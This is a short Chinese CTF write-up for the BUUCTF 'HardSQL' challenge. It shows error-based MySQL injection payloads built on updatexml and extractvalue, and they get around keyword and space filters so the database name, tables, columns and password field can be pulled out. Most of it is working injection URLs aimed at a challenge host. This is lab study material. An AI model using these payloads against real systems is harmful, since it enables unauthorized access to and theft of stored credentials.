[极客大挑战 2019]HardSQL
[极客大挑战 2019]HardSQL
首先简单测试一下题目
0x00
测试过滤了and、= 空格 union等多个sql关键字
0x01
查数据库信息
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21
![图片上传中...]
geek
0x02
查表
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like%27geek%27),0x7e))^%271&password=1
![图片上传中...]
H4rDsq1
0x03
查字段
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like%27H4rDsq1%27),0x7e))^%271&password=1
0x04
查询password
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^%271&password=1
![图片上传中...]
但是这个只有半边
剩下半边
http://fa8a403f-9a12-4207-8e55-4344e5f00773.node3.buuoj.cn/check.php?username=1%27^extractvalue(1,concat(0x7e,(select(group_concat(right(password,13)))from(H4rDsq1)),0x7e))^%271&password=1
![图片上传中...]
0x05
acc
End
